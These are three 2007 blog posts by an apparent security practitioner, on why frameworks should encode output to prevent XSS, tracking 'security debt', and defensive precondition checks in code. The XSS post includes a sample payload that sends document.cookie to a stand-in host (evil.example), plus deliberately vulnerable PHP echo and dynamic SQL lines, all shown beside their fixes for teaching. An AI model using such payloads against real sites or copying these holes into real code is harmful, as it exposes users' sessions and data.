Saturday, December 29, 2007

Why is XSS still a problem?


For all of the non-security people who read this blog: there is an attack vector called Cross-Site Scripting (XSS).  I won't get into the details, but the main reason it is useful is that an attacker can run their code as you.  Why is that bad?  Among other things, they could:
- Steal your login session 
- Make requests as you (e.g. Transfer $1,000 to evil account)
- And on and on and on :)

The point of my post is this: why is XSS even still around, except for corner cases?  In other words, why haven't the frameworks made it hard for a developer to create an XSS?  XSS happens for only one reason: poor output encoding, period.  I agree output encoding can be tricky in weird edge cases, but even then the problem might not be poor output encoding but rather poor coding in general.
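To make this concrete, here is a tiny PHP sketch (the page and parameter names are made up):

<?php
// Vulnerable: whatever the attacker puts in ?q= lands straight in the page, e.g.
// search.php?q=<script>document.location='http://evil.example/'+document.cookie</script>
echo "You searched for: " . $_GET['q'];

// Fixed: one encoding call turns the payload into harmless text.
echo "You searched for: " . htmlspecialchars($_GET['q'], ENT_QUOTES, 'UTF-8');
?>

The difference between owned and safe is literally one function call, which is why it bugs me that frameworks don't make that call for you.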

This question has been on my mind for the past few weeks.  I think I have narrowed it down to a few reasons:
1) Frameworks are too scared to make this change because it would bust existing web applications
2) Frameworks expect it is up to the developer to do proper output encoding
3) The framework developers don't know any better

Since the third one has a simple solution (educate or fire the developers) I will only focus on the first two.  

Frameworks are too scared to make this change because it would bust existing web applications. This case only comes up when there is an existing framework and we want to retrofit uniform output encoding across the board.  My example for this is the .Net framework.  .Net is a decent framework and I can't knock it. However, the output encoding is not uniform, which makes it easy for developers to screw up: you have to remember the differences between 20+ web controls, plus the variations depending on the property used.  While it is possible to remember all of this, remembering it while your boss is yelling at you to get the feature done by 5PM or else your arse is out of there could be an issue :).  The .Net framework just released v3 and it seems even more solid and polished, but encoding is still not uniform.  Why?  My guess is that if they broke how the controls operated, developers would break out the pitchforks and storm Redmond, WA.  I can understand this because everyone loves to beat up on MS, but boy I would love to see this change.

Another example is Ruby on Rails (RoR).  They recently released 2.0, and my own little application had a few things busted by the new version, because RoR is known for being on the leading edge, removing cruft, and always doing the best thing for the framework.  If the devs have to work a bit harder, so be it.  I am sure there are other examples, but these are the ones I thought of.

How could we fix the .Net framework and not have it bust existing web applications?  How about a configuration value that says whether we should encode everything or not?  Maybe "LegacyEncoding" could be the configuration name.  Have it set to false by default, but if someone wanted to turn it on, let them hang themselves.
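Here is a rough sketch of how that flag could work.  I am using PHP just to show the idea - none of this is real .Net API, and frameworkConfig() is a helper I made up:

<?php
// Made-up helper standing in for a framework configuration lookup.
function frameworkConfig($name) {
  $config = array('LegacyEncoding' => false); // off by default
  return isset($config[$name]) ? $config[$name] : false;
}

// Every control's output would funnel through something like this.
function renderControlText($text) {
  if (frameworkConfig('LegacyEncoding')) {
    return $text; // old behavior: raw output, you asked for the rope
  }
  return htmlspecialchars($text, ENT_QUOTES, 'UTF-8'); // encoded by default
}
?>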

Frameworks expect it is up to the developer to do proper output encoding. Boy, I love this reason.  Yes, there are quite a few good web developers out there who understand proper output encoding, when and why we need to set a charset, and everything else.  However, there are even more developers out there who have no clue.  I wish this were not the case, but my experience has shown me otherwise.  Sure, a framework might initially be adopted only by the l33t coders who know all of this stuff, and you can stick your tongue out at me and say "nah-nah-nah you are wrong so pooh on you", but eventually the non-l33t coders will come, and then there will be issues.  At that point you are back to the first issue I pointed out, if you didn't do proper output encoding from the beginning.

One example is once again RoR - I apologize for all the RoR examples, but I am a bit enamored with that framework at the moment - where database access goes through methods by default and all the examples show parameterized queries, etc.  If you ever see dynamic SQL you will see warnings that it is bad, leads to possible security issues, and is a code smell.  Great!  Why?  Because there are these attacks called SQL injection that were/are fairly common and can wreak havoc on database-backed systems.  RoR is a good example of making it hard to do something that is known to be bad when there is a better alternative.
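The same idea translates outside of Rails.  Since my code samples here are PHP, this is roughly what the parameterized version looks like with PDO (the connection details are placeholders):

<?php
$db = new PDO('mysql:host=localhost;dbname=app', 'user', 'secret');

// BAD: dynamic SQL - the classic injection hole the warnings are about.
// $rows = $db->query("SELECT * FROM users WHERE name = '" . $_GET['name'] . "'");

// GOOD: the user input travels as data, never as SQL text.
$stmt = $db->prepare('SELECT * FROM users WHERE name = ?');
$stmt->execute(array($_GET['name']));
$rows = $stmt->fetchAll();
?>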

Another example is Visual Studio and its warnings/errors when you use certain C++ methods that have safer alternatives.  This keeps the user from hanging themselves with calls that are known to lead to certain types of attacks.

I think it would be possible to have a set of controls and/or a framework that output encodes everything by default.  If you wanted something not output encoded, you would have to explicitly ask for it instead of the other way around.  Would this solve all XSS?  Heavens no, but, as I said earlier, if we can kill off 80+% of the issues that would go a long way.
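As a sketch of what I mean, imagine a pair of template helpers where encoding is the default and raw output is the thing you have to spell out.  The names out() and outRaw() are made up, but the shape is the point:

<?php
// Encoded by default: this is the one you reach for 99% of the time.
function out($value) {
  echo htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Raw output is still possible, but the name forces you to mean it.
function outRaw($value) {
  echo $value;
}

out($_GET['comment']);      // safe without thinking about it
// outRaw($trustedMarkup);  // the dangerous path is the deliberate one
?>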

Thursday, December 13, 2007

Where is the security debt?


In development there is a term, technical debt, which basically means that there are bits and pieces left over from development that still need to be finished. It could be some refactoring on a messy class, a hacky implementation, missing functionality, etc... I think we need to use this same idea in security. I know when we boil it all down it could be filed under technical debt; however, I think security should be its own category, as it has a different impact than a poorly written class...well, most of the time :).

Just like in development, when securing a product the cost of doing the work has to be weighed against the risk of an incident occurring to come up with a business case for doing the work. On top of that, there is a schedule that needs to be adhered to. What this means is that not all of the security work and/or testing gets done. I have seen this on many products, and I still see it in applications I use throughout the day (just monitor any vulnerability web site and you will see what I am talking about). However, I hardly ever see a list of the things that still need to be done - or, as I like to think of it, a debt sheet. When the next iteration of the software comes around, or when maintenance is going to be done on an area that also has outstanding security work, that security work should be bundled in to whittle down the debt.

I would think in a perfect world the following scenario would happen:
1) A product is built, the security work is done, and a list of what was done and what still needs to be done is kept in a central location.
2) Once the product is finished, security personnel go through the list of things not done and remove items that are no longer valid (the threat landscape has changed, it has been fixed by something else, etc...)
3) When the next version / iteration is being built, this list is brought out and gone through again, and any cruft is removed. After that, the remaining debt is put into the things that need to be planned for.
4) Repeat steps 2 and 3 for each product iteration until no security stuff needs to be done (yeah, right!).

Sunday, December 02, 2007

One metric of a decent programmer


There are many, many, many metrics for figuring out whether a person who can program is in any way decent.  One thing I look for when reading people's production code is how trusting they are.  Since I work in security this is something I look at from that perspective, but I also think that if you want to program well you just can't trust data, period.

Now, the few people who have read my code know I don't always do this.  Why?  Well, there are two reasons:
1) I never claimed I am a decent coder 
2) It is tedious work to always check your inputs 

However, I have seen some decent code, and the people who write it tend not to trust anything.  What does that mean?  It means stating the pre-conditions of your code and then checking them, be it with asserts, validation checks, or contracts.

For example, let's say you are expecting an ID to be passed in somewhere in the range of 1 to 100.  The code should look like this:
// Description: This is a test method
// Pre-condition: We expect an id between 1 and 100 to be passed in 
// 
// Post-condition: Our work is done
// 
// Parameters:
//    id = The id we need to use for the lookup
function junkFunction($id) {
  // Do our pre-condition check
  if (($id < 1) || ($id > 100)) {
    // return an error code or throw an exception
    throw new InvalidArgumentException('id must be between 1 and 100');
  }

  // do work since pre-conditions checked out and return
}
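Now a bad caller finds out immediately instead of limping along with garbage:

junkFunction(500); // throws an InvalidArgumentException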

Why is this good?  Because there is a smaller chance that low-hanging bugs will surface, and on top of that the programmer has to THINK more about what he is doing.  Sure, it might not be as fast, but most of the time that does not matter (plus performance tuning should be done after the code is initially working and not any time before that).

Why do I think this should be a metric of a decent programmer overall?  Because I think good programmers realize that other people (or their future selves) will eventually read or use their code.  They can't always trust that what is passed in will match the assumptions used when writing the code.  I also think it shows that the coder was actually thinking about what the function was supposed to be doing, and not just doing what they were told the function was supposed to do.  What does this mean?  It means they have to understand the business or user needs.

Once again this isn't the one and only metric, just one that I think should be used when evaluating all coders.